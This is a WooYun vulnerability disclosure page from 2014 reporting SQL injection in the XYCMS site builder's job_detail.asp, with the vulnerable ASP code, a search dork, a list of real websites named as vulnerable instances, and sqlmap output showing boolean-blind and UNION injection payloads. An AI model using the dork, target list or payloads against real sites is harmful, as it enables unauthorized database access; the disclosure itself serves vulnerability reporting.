XYCMS建站系统SQL注入#2 | wooyun-2014-089110| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-089110

漏洞标题：XYCMS建站系统SQL注入#2

漏洞作者：路人甲

提交时间：2014-12-31 14:27

修复时间：2015-03-31 14:28

公开时间：2015-03-31 14:28

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-12-31：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-03-31：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

XYCMS建站系统SQL注入#2

详细说明：

同第一个
XYCMS建站系统SQL注入#1
这里提交的在wooyun没有提交过！这里提交不重复，证明：

除了：fwxm_detail.asp，news.asp，team_detail.asp这些外。。。
job_detail.asp未对id进行任何过滤就直接带入数据库查询

id=request.QueryString("id")
set rs=server.createobject("adodb.recordset") 
exec="select * from zpxx where id="& id
rs.open exec,conn,1,1
if rs.eof then
response.Write "<div style=""padding:10px"">没有相关信息！</a>"
response.End()
end if

漏洞证明：

搜索特征：
inurl:job_detail.asp?id=
实例：
http://www.qdzhihui.cn/job_detail.asp?id=22
http://www.jmofcole.com/job_detail.asp?id=3
http://www.cdmalc.com/job_detail.asp?id=2
http://www.czjt.com/job_detail.asp?id=386
http://www.shenzhouintl.com/cn_jt/job_detail.asp?id=26
http://www.njjldg.com/job_detail.asp?id=2
http://www.xmwx.org.cn/job_detail.asp?id=45
http://zqrc.com.cn/job_detail.asp?id=29763
http://www.zn-test.cn/job_detail.asp?id=2
http://www.qdzhihui.cn/job_detail.asp?id=23
...

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] n
sqlmap identified the following injection points with a total of 22 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=22 AND 3795=3795
    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: id=-8961 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(58)&CHR
(104)&CHR(118)&CHR(121)&CHR(58)&CHR(106)&CHR(85)&CHR(73)&CHR(88)&CHR(100)&CHR(68
)&CHR(68)&CHR(110)&CHR(69)&CHR(108)&CHR(58)&CHR(113)&CHR(107)&CHR(104)&CHR(58),N
ULL,NULL FROM MSysAccessObjects%00
---

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-089110

漏洞标题：XYCMS建站系统SQL注入#2

相关厂商：XYCMS

漏洞作者：路人甲

提交时间：2014-12-31 14:27

修复时间：2015-03-31 14:28

公开时间：2015-03-31 14:28

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-089110

漏洞标题：XYCMS建站系统SQL注入#2

相关厂商：XYCMS

漏洞作者： 路人甲

提交时间：2014-12-31 14:27

修复时间：2015-03-31 14:28

公开时间：2015-03-31 14:28

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-089110"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云